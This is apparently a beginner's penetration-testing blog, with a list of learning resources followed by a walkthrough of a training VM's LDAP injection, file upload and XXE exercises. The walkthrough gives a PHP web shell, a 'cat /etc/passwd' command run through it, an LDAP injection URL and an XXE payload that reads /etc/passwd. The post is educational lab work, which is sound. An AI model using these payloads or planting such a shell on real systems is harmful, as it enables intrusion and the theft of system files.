Resources for beginners

So you’re looking to get into the wonderful world of penetration testing, but have no clue where to start? Don’t worry I was just like you (hence why started this blog). In this post I’ll provide some resources to help get you started.

Programming Languages

To be able to exploit a system, you will need to know how to program and (at least) know the basics of the language the system uses, that you are exploiting. A simple scripting language that I recommend is python. It’s easy to learn and allows you build quick scripts to help exploit a system. Also, since you’ll most likely be starting off by exploiting web pages and web applications, you should learn HTML, JavaScript and php. A lot of web pages and applications are built using these languages, along with CSS. Codecademy is a good site to help you learn these languages, they offer great tutorials in all these languages and more.

Basic Exploitation walk-through.

Now that you have learnt how a web apps are put together, how do you start exploiting a site or a companies network? Penetration Testing: A hands on introduction to hacking is a great resource for beginners. It covers the basics in  the penetration testing process and some of the tools used in each process. It definitely helped me get started and wrap my head around some of the tools used.

Another great resource to help you get started with basic web application testing is pentesterlab, particularly the web for pentesters series give you a great solid understanding of the type of exploits that are found on web applications. P.S I have a basic walk through of the first web for pentesters vm on my blog.

How do I sharpen my skills?

Now that you know the basics, you need to practice your skills, but how? Pentesterlab has some more advanced tutorials for you to try. Another similar vulnerable vm is webgoat, it has a similar style to pentesterslab vm, where they walk through with each of the exploits and explain why the exploit exists. 
Whats that, you want something a little more challenging? Well then vulnhub has you covered. They offer community made virtual machines and the solutions offered are made by people who have completed the challenge. They are challenging, but not impossible and if you get stuck you can always look at the solutions and see how that person solved it.

Write your own exploits.

A great book to learn how to write your exploits, one that I am currently working through, violent python. This book teaches you how to write your own exploits, botnet, viruses in python. This is of course is a little advanced and could be something to build up to.

Some advice.

Lastly, I’ll leave you with some advice that I wish I knew earlier. PRACTICE,PRACTICE,PRACTICE. Just practice and really spend the time understanding how an exploit happens and why. Also build applications yourself, exploit them and patch them. This will help you understand what to look for when trying to find exploits in a system or web application. 
If you have any questions or suggestions, drop me a line in the comment section below. Until next time, keep on hacking.

Web for pentesters 1, LDAP,File upload and XML attacks.

In this post ill be walking through the web for pentesters 1 LDAP, file upload and XML attacks. These are the last of the exercises for the virtual machine and will conclude this series.

First off what is LDAP? LDAP (lightweight Directory Access Protocol) is a protocol for accessing and maintaining a directory over the internet. So it basically allows a user to access a directory remotely and modify it as if they where on that physically on that machine.

LDAP Answers:
Example 1:
For the first example, we just remove everything in the URL from php? on-wards and this should result in you being authenticated.

Example 2:
For example 2 you will need to comment out the rest of the code and have the protocol accept any password you pass it.

the URL you end up with should look something like this:
example2.php?name=hacker)(cn=*))&password=fake.

is a null byte that comments out any code after it.

File Upload:

The code we will use in the file that will be uploaded if the following:
<?php
    system($_GET[“cmd”]);
?>

Copy that into the a php file.
example 1:
Upload the php file with the code above, once uploaded follow the link provided by the vm. 
Once on that page, you should get an error saying the system cannot execute a blank command
All you now have to do is append ?cmd=cat /etc/passwd to output the passwd file contents on the page.
example 2:
For this example you will need to create a new file with the code above and the extension .php.blah, you swap blah for something else, just make sure the server can’t process it.
Upload the file, click the link and you should get the same error you got in example 1. Now all you have to do is append ?cmd=cat /etc/passwd to the URL and you should get the passwd file displayed.
XML attack:
Example 1:
Here all you have to is type in the command provided by pentesterlabs into the URL with a null byte () at the end and the exploit should work.
<%21DOCTYPE%20test%20%5b<%21ENTITY%20hacker%20SYSTEM%20″file%3a%2f%2f%2fetc%2fpasswd”>%5d><test>%26hacker%3b<%2ftest>%0a%0a
Example 2: 
If you follow what is on pentesterslab, the exploit should work and give you the password pentesterlab.